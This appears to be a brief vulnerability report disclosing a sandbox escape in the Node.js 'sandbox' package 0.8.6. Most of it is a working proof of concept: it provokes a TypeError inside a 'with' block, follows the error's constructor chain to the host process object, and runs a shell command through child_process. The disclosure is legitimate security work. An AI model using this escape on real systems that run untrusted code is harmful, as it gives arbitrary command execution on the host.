Sandbox Escape Bug

[seongil-wi]

• Sandbox version: 0.8.6
• Node version: 18.15.0

var Sandbox = require("sandbox")
var code = `
try{ 
    const proto = {};
    const obj = { __proto__: {} };
    proto[Symbol.unscopables] = {};
    with (proto) {
      isPrototypeOf(obj);
    }
} catch(pp){
    pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag');
}
`

s = new Sandbox()
s.run(code)

Sandbox can be escaped by TypeError which can be occurred when it cannot convert undefined or null to object.
Also, we can execute arbitrary shell code using process module.